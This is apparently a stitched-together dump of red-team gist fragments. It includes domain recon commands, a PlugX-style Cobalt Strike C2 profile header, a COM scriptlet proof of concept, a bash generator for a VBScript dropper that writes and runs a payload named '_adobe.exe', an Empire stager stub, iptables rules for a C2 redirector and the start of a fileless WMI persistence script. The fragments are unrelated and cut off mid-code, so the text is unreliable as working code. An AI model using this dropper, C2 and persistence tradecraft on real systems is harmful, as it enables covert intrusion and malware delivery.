echo %LOGONSERVER%
net view /DOMAIN:domain
# | |
# PlugX Profile | |
# Author: @infosecn1nja | |
# | |
# https://github.com/silence-is-best/c2db/blob/master/README.md | |
set sleeptime "30000"; # use a ~30s delay between callbacks | |
set jitter "10"; # throw in a 10% jitter | |
stage { |
<?XML version="1.0"?> | |
<scriptlet> | |
<registration | |
progid="PoC" | |
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > | |
<!-- Proof Of Concept - Casey Smith @subTee --> | |
<!-- License: BSD3-Clause --> | |
<script language="JScript"> | |
<![CDATA[ | |
#!/bin/bash | |
convert2hex=$(xxd -p $1) | |
result=$(echo $convert2hex | sed s'/ //g') | |
echo 'Function n(s,c):n=String(s,c):End Function:t=t&"'$result'":Set s=CreateObject("Scripting.FileSystemObject"):p=s.getspecialfolder(2) & "_adobe.exe":Set f=s.CreateTextFile(p,1):for i=1 to len(t) step 2:f.Write Chr(int("&H" & mid(t,i,2))):next:f.Close:WScript.CreateObject("WScript.Shell").run(p)' |
from lib.common import helpers | |
class Stager: | |
def __init__(self, mainMenu, params=[]): | |
self.info = { | |
'Name': 'wmic_xsl_starfighters', | |
'Author': ['@subTee','@mattifestation','@infosecn1nja','@Cneelis'], |
#!/usr/bin/python | |
import argparse | |
import re, random | |
import string, os, os.path | |
def rand_num(min, max): | |
return random.randrange(min, max) | |
def gen_str(size): | |
return "".join(random.SystemRandom().choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(size)) |
using System; | |
using System.Diagnostics; | |
using System.Runtime.InteropServices; | |
using System.Text; | |
public class TestClass | |
{ | |
public TestClass() | |
{} |
Make a rule that allows port 80/443 access only from redirector: | |
iptables -A INPUT -p tcp -s <REDIRECTOR_IP> --dport 443 -j ACCEPT | |
iptables -A INPUT -p tcp --dport 443 -j DROP | |
iptables -A INPUT -p tcp -s <REDIRECTOR_IP> --dport 80 -j ACCEPT | |
iptables -A INPUT -p tcp --dport 80 -j DROP | |
Change default port teamserver : | |
sed -i 's/50050/<PORT>/g' /path/cobaltstrike/teamserver |
# Fileless WMI Persistence (PSEDWMIEvent_SU - SystemUptime) | |
# https://wikileaks.org/ciav7p1/cms/page_14587908.html | |
<# | |
.SYNOPSIS | |
This script creates a persisted WMI event that executes a command upon trigger of the system's uptime being between a given range in seconds. The event will trigger only once. | |
#> | |
$EventFilterName = "Fileless WMI Persistence SystemUptime" |
APT Group/Red Team Weaponization Phase | |
======================================= | |
C2 tools : | |
- Cobalt Strike | |
- Empire | |
- PoshC2 | |
- PupyRAT | |
- Metasploit |